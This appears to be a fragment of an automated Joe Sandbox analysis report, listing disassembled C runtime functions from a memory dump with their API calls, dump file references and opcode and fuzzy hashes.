                                                                                                          • Instruction Fuzzy Hash: 15911AB2E00718EBDB84DFE8DC84ADDB7B9AF48724F14812AF514E7291D774B9418B60
                                                                                                          Function 6FDCCB30 Relevance: 13.7, APIs: 9, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcscmp.MSVCR100(?,6FDB3014,00000000,-00000002,6FE25BD0), ref: 6FDCCBBD
                                                                                                          • wcscmp.MSVCR100(?,6FDCCCF8,00000000,-00000002,6FE25BD0), ref: 6FDCCBD4
                                                                                                          • _wcsdup.MSVCR100(?,00000000,-00000002,6FE25BD0), ref: 6FDCCBF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscmp$_wcsdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4151667949-0
                                                                                                          • Opcode ID: 2100e5c38f3f90678d60ed0acfa4c022b492f1ab029210405b300781f0a60622
                                                                                                          • Instruction ID: 5b3dfbbb8c219164ecb82728f44df772e4c98b29bb34872bfe4333fe8d9796ec
                                                                                                          • Opcode Fuzzy Hash: 2100e5c38f3f90678d60ed0acfa4c022b492f1ab029210405b300781f0a60622
                                                                                                          • Instruction Fuzzy Hash: A3515E32904351EADB914FB99A8059E77BDEF01374731461BEF64EB180EF30F9829692
                                                                                                          Function 6FD842BF Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno
                                                                                                          • String ID:
                                                                                                          • API String ID: 467780811-0
                                                                                                          • Opcode ID: 8182bdb95046fefc0ba30e1fe674e7df630c8df4cfcc1974a4de04af5bffee20
                                                                                                          • Instruction ID: 2e972cab95e3ca52064058987d4d17a5677a5bcee18e30a280a098b3f41be71c
                                                                                                          • Opcode Fuzzy Hash: 8182bdb95046fefc0ba30e1fe674e7df630c8df4cfcc1974a4de04af5bffee20
                                                                                                          • Instruction Fuzzy Hash: 8B510072504701DBCBA19F38D844BAA77E4BF12328B108A2AE4B9DB2D0E736F541CB55
                                                                                                          Function 6FD92ACE Relevance: 13.7, APIs: 9, Instructions: 165COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memcpy_s.MSVCR100(?,?,?,?), ref: 6FD92B77
                                                                                                          • _errno.MSVCR100 ref: 6FDA8C29
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA8C34
                                                                                                          • memset.MSVCR100(?,00000000,?), ref: 6FDA8C47
                                                                                                          • _fileno.MSVCR100(?,?,?), ref: 6FDA8CA3
                                                                                                          • _read.MSVCR100(00000000,?,?), ref: 6FDA8CAA
                                                                                                          • memset.MSVCR100(?,00000000,000000FF), ref: 6FDA8CD4
                                                                                                          • _errno.MSVCR100 ref: 6FDA8CDC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnomemset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 97549664-0
                                                                                                          • Opcode ID: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                          • Instruction ID: 0ef8b02565bb58ccd3ecdfe4c305d4af2108edad037510d8438492937517707c
                                                                                                          • Opcode Fuzzy Hash: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                          • Instruction Fuzzy Hash: D4510134A06309EBCB908FB8C94468EB7B5AF41329F10872AE874A72D0D731FA40CF51
                                                                                                          Function 6FDC0CE3 Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,6FDB8C3B,00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDC0CFF
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6FDC0D3F
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6FDC0D92
                                                                                                          • memset.MSVCR100(00000000,00000000,00000120), ref: 6FDC0DA4
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC0DC9
                                                                                                          • memset.MSVCR100(00000020,00000000,00000100), ref: 6FDC0DDD
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC0E84
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC0E91
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC0EB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@CriticalEventSectionmemset$CloseCreateEnterHandleLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3406441110-0
                                                                                                          • Opcode ID: 633e5d4d1c586da1e4b671be73aad7c55987192e86563184d317d57a95431f94
                                                                                                          • Instruction ID: 38910e150f89eaf27bb9259e25ec1c6a696a4239f9ad738512f0761c6ab0a004
                                                                                                          • Opcode Fuzzy Hash: 633e5d4d1c586da1e4b671be73aad7c55987192e86563184d317d57a95431f94
                                                                                                          • Instruction Fuzzy Hash: 965169B0A00712DFD764CF68C494B9AB7F8FF09354F00866AE899DB690D730B950CBA1
                                                                                                          Function 6FD8ED1C Relevance: 13.6, APIs: 9, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(6FD908FE,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED27
                                                                                                          • _write.MSVCR100(6FD908FE,FFFF9B4B,00000000,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED95
                                                                                                          • __p__iob.MSVCR100(6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD9276F
                                                                                                          • __p__iob.MSVCR100(6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD9277F
                                                                                                          • _errno.MSVCR100(?,?,?,6FD908FE,00000040,?), ref: 6FDA88CD
                                                                                                          • _errno.MSVCR100(?,?,?,6FD908FE,00000040,?), ref: 6FDA88E4
                                                                                                          • _isatty.MSVCR100(6FD908FE,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA890B
                                                                                                          • _lseeki64.MSVCR100(6FD908FE,00000000,00000000,00000002,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8928
                                                                                                          • _write.MSVCR100(6FD908FE,00000040,00000001,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8948
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob_errno_write$_fileno_isatty_lseeki64
                                                                                                          • String ID:
                                                                                                          • API String ID: 951745809-0
                                                                                                          • Opcode ID: 3f134099085613ff0aa2bf7498f7b436e5d824146184b37962d68048b83646ac
                                                                                                          • Instruction ID: dea64ebb432f5ad865fb05c3c3de532fec5a13befa0e20913e878840152a5fc5
                                                                                                          • Opcode Fuzzy Hash: 3f134099085613ff0aa2bf7498f7b436e5d824146184b37962d68048b83646ac
                                                                                                          • Instruction Fuzzy Hash: ED41C275808745DED7A48FB9C841A9A7BA5EF42334B10C71EE8BA9B2D0DB34F9408F11
                                                                                                          Function 6FDFE502 Relevance: 13.6, APIs: 9, Instructions: 99stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcstombs_s.MSVCR100(?,00000000,00000000,?,7FFFFFFF,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE532
                                                                                                            • Part of subcall function 6FD85E00: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FD85E16
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE54D
                                                                                                          • _calloc_crt.MSVCR100(?,00000001), ref: 6FDFE55C
                                                                                                          • wcstombs_s.MSVCR100(00000000,00000000,?,?,000000FF), ref: 6FDFE571
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE58C
                                                                                                          • strlen.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5AA
                                                                                                          • free.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5CA
                                                                                                          • _errno.MSVCR100(00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5CF
                                                                                                          • strlen.MSVCR100(00000000,00000000,00000000,?,?,?,?,?,?,?,6FDFE618,00000010), ref: 6FDFE5DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: freestrlenwcstombs_s$_calloc_crt_errno_invoke_watson_wcstombs_s_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1663103391-0
                                                                                                          • Opcode ID: f204307dc190d96cb50aaed65692436c62fc65eedabdebb128ec0ae944e19d7b
                                                                                                          • Instruction ID: 92614c807229ee6052d8e790913c3cffa348478162846f8ead2d9cd17609dee2
                                                                                                          • Opcode Fuzzy Hash: f204307dc190d96cb50aaed65692436c62fc65eedabdebb128ec0ae944e19d7b
                                                                                                          • Instruction Fuzzy Hash: AF219DB1C02B10B0EAF227A84C45FEF7A685F4172CF664306F039AB1D1EB51758285B2
                                                                                                          Function 6FDE0D32 Relevance: 13.6, APIs: 9, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDE0D69
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDE0D74
                                                                                                          • _errno.MSVCR100(?,?,?), ref: 6FDE0D9F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6FDE0DAA
                                                                                                          • _strncoll_l.MSVCR100(?,?,?,?,?,?,?), ref: 6FDE0DC0
                                                                                                          • _mbsnbcnt_l.MSVCR100(?,?,?,?,?,?), ref: 6FDE0DD0
                                                                                                            • Part of subcall function 6FDE0433: _errno.MSVCR100(?), ref: 6FDE0453
                                                                                                            • Part of subcall function 6FDE0433: _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE045E
                                                                                                          • _mbsnbcnt_l.MSVCR100(?,?,?,?,?,?,?,?,?), ref: 6FDE0DDE
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001000,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6FDE0DFB
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6FDE0E07
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_mbsnbcnt_l$CompareString__crt_strncoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1599563686-0
                                                                                                          • Opcode ID: 04cbbd3cbea2595469da91d9d75feb43525bccafedc33f105a99543af39aa024
                                                                                                          • Instruction ID: 5c913fd6b369697693550ce6e3c7d6ac31eba3c9e100507abd58c3f73d65193f
                                                                                                          • Opcode Fuzzy Hash: 04cbbd3cbea2595469da91d9d75feb43525bccafedc33f105a99543af39aa024
                                                                                                          • Instruction Fuzzy Hash: 2E31AF71801349EBDB519FA8CC48BAF7B78AF023A4F145399A4706B1E0DF71B951CBA1
                                                                                                          Function 6FDC8E43 Relevance: 13.6, APIs: 9, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC2407: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6FDBD7F5,00000000,?,00000000,00000000), ref: 6FDC2439
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6FDC2494
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6FDC24A3
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24B2
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24C1
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24D0
                                                                                                            • Part of subcall function 6FDC2407: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24DF
                                                                                                            • Part of subcall function 6FDC2407: GetCurrentThread.KERNEL32 ref: 6FDC24FD
                                                                                                            • Part of subcall function 6FDC2407: GetThreadPriority.KERNEL32(00000000), ref: 6FDC2504
                                                                                                            • Part of subcall function 6FDBF0E7: EnterCriticalSection.KERNEL32(6FDBD7C5,00000008,6FDC8EA2), ref: 6FDBF100
                                                                                                            • Part of subcall function 6FDBF0E7: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6FDBF112
                                                                                                            • Part of subcall function 6FDBF0E7: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6FDBF137
                                                                                                            • Part of subcall function 6FDBF0E7: LeaveCriticalSection.KERNEL32(?), ref: 6FDBF159
                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FDC8EA6
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8EB6
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8ECE
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC8EDC
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8EF9
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8F11
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC8F3B
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC8F53
                                                                                                          • InitializeSListHead.KERNEL32(000000E8), ref: 6FDC8F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$??0scheduler_resource_allocation_error@CriticalErrorLastSection$??2@InitializeThread$CountCreateCurrentEnterEventExceptionHeadLeaveListPrioritySpinThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3885097699-0
                                                                                                          • Opcode ID: 6bd591921c0e072cff8e5c73128612a9d3b8d3d0f160eb52ede26a172da5127a
                                                                                                          • Instruction ID: a53b2a8a4738202148e167aba605e708ea3a7c2d6cfd1885aeb68e3ce34ef39d
                                                                                                          • Opcode Fuzzy Hash: 6bd591921c0e072cff8e5c73128612a9d3b8d3d0f160eb52ede26a172da5127a
                                                                                                          • Instruction Fuzzy Hash: 08317EB1804746DFC750DFA4C880F9EBBB8BF05314F548A2DE42AEB180DB34B5559B61
                                                                                                          Function 6FDC1EC7 Relevance: 13.6, APIs: 9, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6FDC1EC2,?,?,?,?,?,6FDC03E2,?,00000000,6FE255E0,0000000C,6FDC0342,?,?), ref: 6FDC1ED7
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • memcpy.MSVCR100(00000000,6FE27310,00000024,0000003C,6FDC1EC2,?,?,?,?,?,6FDC03E2,?,00000000,6FE255E0,0000000C,6FDC0342), ref: 6FDC1EF4
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?,6FE20DC8,?,00000002,00000001), ref: 6FDC1F27
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8,?,00000002,00000001), ref: 6FDC1F3C
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,6FDB3A50,6FE20DAC,?), ref: 6FDC1F5B
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6FDC1F7E
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6FDC1F89
                                                                                                          • ??0invalid_scheduler_policy_thread_specification@Concurrency@@QAE@XZ.MSVCR100(00000002,00000001), ref: 6FDC1F9F
                                                                                                          • ??0invalid_scheduler_policy_value@Concurrency@@QAE@XZ.MSVCR100(?,00000002,00000001), ref: 6FDC1FBB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@Policy$??0exception@std@@ElementKey@2@@Policy@SchedulerValue@$??0invalid_scheduler_policy_thread_specification@??0invalid_scheduler_policy_value@??2@ExceptionThrowmallocmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 554869834-0
                                                                                                          • Opcode ID: e34291bbde1fdf2f00443f25c98cbf3292fbe7fc6e370fdd9d27e5009c555f1d
                                                                                                          • Instruction ID: 97b660b73e0776bfaf5da5d1a3d71cd4e8ba40864e04377f57afe0317694c752
                                                                                                          • Opcode Fuzzy Hash: e34291bbde1fdf2f00443f25c98cbf3292fbe7fc6e370fdd9d27e5009c555f1d
                                                                                                          • Instruction Fuzzy Hash: 053189769053149BCF84DFB8C891ACDB7B9AF45348F504216E515AB2D0DB30BA45CB72
                                                                                                          Function 6FDF4CF0 Relevance: 13.6, APIs: 9, Instructions: 85stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __unDName.MSVCR100(00000000,?,00000000,?,?,00002800,6FDF4DE8,0000000C,6FDF3731,?,?), ref: 6FDF4D1F
                                                                                                            • Part of subcall function 6FD944CA: _lock.MSVCR100(00000005,6FD94558,00000064), ref: 6FD944ED
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDF4D36
                                                                                                          • _lock.MSVCR100(0000000E), ref: 6FDF4D54
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDF4D64
                                                                                                          • malloc.MSVCR100(-00000003), ref: 6FDF4D74
                                                                                                          • strcpy_s.MSVCR100(00000000,-00000003,?), ref: 6FDF4D86
                                                                                                          • free.MSVCR100(?), ref: 6FDF4DBB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lockmalloc$Name__unfreestrcpy_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3329257654-0
                                                                                                          • Opcode ID: 2c56fbe6fb42a6409b92f94a9e684f437be974323d4a21e648bdd8c4b568d4e9
                                                                                                          • Instruction ID: 8f20533ab14f4e4a34d87263a5ca3526d6e51df58f01ca466808659a3163c149
                                                                                                          • Opcode Fuzzy Hash: 2c56fbe6fb42a6409b92f94a9e684f437be974323d4a21e648bdd8c4b568d4e9
                                                                                                          • Instruction Fuzzy Hash: D621D0B1906302EAD7806FB4DE84E4EBBE8BF06358B128129E5289F291DB70F541C660
                                                                                                          Function 6FD8AC1F Relevance: 13.6, APIs: 9, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FD8ACE4
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD1D
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD25
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD3B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD46
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD4D
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD55
                                                                                                          • _errno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD62
                                                                                                          • __doserrno.MSVCR100(6FD8ACC0,00000010,6FD8CDD1,00000000,?,?,?,?,6FD93129,?), ref: 6FDAFD6D
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8AB09: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6FD8ABCF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
